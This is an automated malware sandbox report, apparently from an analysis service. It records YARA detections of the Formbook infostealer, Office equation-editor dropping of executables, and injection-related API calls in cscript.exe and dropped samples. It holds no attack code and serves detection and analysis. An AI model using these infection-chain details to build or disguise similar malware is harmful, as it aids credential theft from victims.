            Source: Yara matchFile source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\tynex.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exeJump to dropped file
            Source: C:\Users\Public\tynex.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\tynex.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\tynex.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135A100 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135A050 NtClose,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01359F20 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01359FD0 NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135A04C NtClose,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135A0FA NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01359F1A NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01359FCA NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009900C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00990048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00990078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009910D0 NtOpenProcessToken,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00990060 NtQuerySection,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009901D4 NtSetValueKey,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0099010C NtOpenDirectoryObject,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00991148 NtOpenThread,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009907AC NtCreateMutant,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098F8CC NtWaitForSingleObject,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098F938 NtWriteFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00991930 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FAB8 NtQueryValueKey,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FA20 NtQueryInformationFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FA50 NtEnumerateValueKey,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FBE8 NtQueryVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FB50 NtCreateKey,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FC30 NtOpenProcess,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FC48 NtSetInformationFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00990C40 NtGetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00991D80 NtSuspendThread,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FD5C NtEnumerateKey,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FE24 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FFFC NtCreateProcessEx,
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0098FF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E00C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E07AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFAB8 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFB50 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DF900 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DF9F0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E0048 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E0078 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E0060 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E10D0 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E1148 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E010C NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E01D4 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFA50 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFA20 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFBE8 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DF8CC NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DF938 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E1930 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFE24 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFEA0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFF34 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFFFC NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFC48 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E0C40 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFC30 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFC90 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025DFD5C NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025E1D80 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008A050 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008A100 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00089F20 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00089FD0 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008A04C NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008A0FA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00089F1A NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00089FCA NtReadFile,
            Source: C:\Users\Public\tynex.exeCode function: 4_2_00293288
            Source: C:\Users\Public\tynex.exeCode function: 4_2_00293286
            Source: C:\Users\Public\tynex.exeCode function: 4_2_00B565F8
            Source: C:\Users\Public\tynex.exeCode function: 4_2_00B56608
            Source: C:\Users\Public\tynex.exeCode function: 4_2_046E6AB0
            Source: C:\Users\Public\tynex.exeCode function: 4_2_046E53C2
            Source: C:\Users\Public\tynex.exeCode function: 4_2_046E538B
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D166
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01341030
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135E376
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01342D90
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135D773
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01342FB0
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135BFA6
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_01349E30
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0135E6D5
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0099E0C6
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009CD005
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009B905A
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A3040
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0099E2E9
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A41238
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009C63DB
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0099F3CF
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A2305
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A7353
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009EA37B
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009B1489
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009D5485
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009BC5F0
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A351F
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A4680
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009AE6C1
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A42622
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009AC7BC
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A2579A
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009D57C3
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A3F8EE
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009AC85C
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009C286D
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009A29B2
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A4098E
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009B69FE
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A25955
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A53A83
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A4CBA4
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_0099FBD7
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A2DBDA
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009C7B00
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_00A3FDDD
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009D0D3B
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009ACD5B
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009D2E2F
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009BEE4C
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009B0F3F
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: 7_2_009CDF7C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02691238
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025EE2E9
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F7353
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0263A37B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F2305
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025EF3CF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_026163DB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_026963BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F3040
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0260905A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0261D005
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025EE0C6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02692622
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0263A634
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025FE6C1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F4680
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_026257C3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025FC7BC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0267579A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0262D47D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02625485
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02601489
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02636540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F351F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0260C5F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_026A3A83
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02617B00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025EFBD7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0267DBDA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0269CBA4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025FC85C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0261286D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0268F8EE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02675955
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_026069FE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0269098E
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025F29B2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0260EE4C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02622E2F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0261DF7C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02600F3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_025FCD5B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02620D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0268FDDD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D166
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008E376
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008E6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008D773
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00072D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00079E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0008BFA6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_00072FB0
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: String function: 0099DF5C appears 107 times
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: String function: 00A0F970 appears 81 times
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: String function: 0099E2A8 appears 38 times
            Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exeCode function: String function: 009E373B appears 238 times
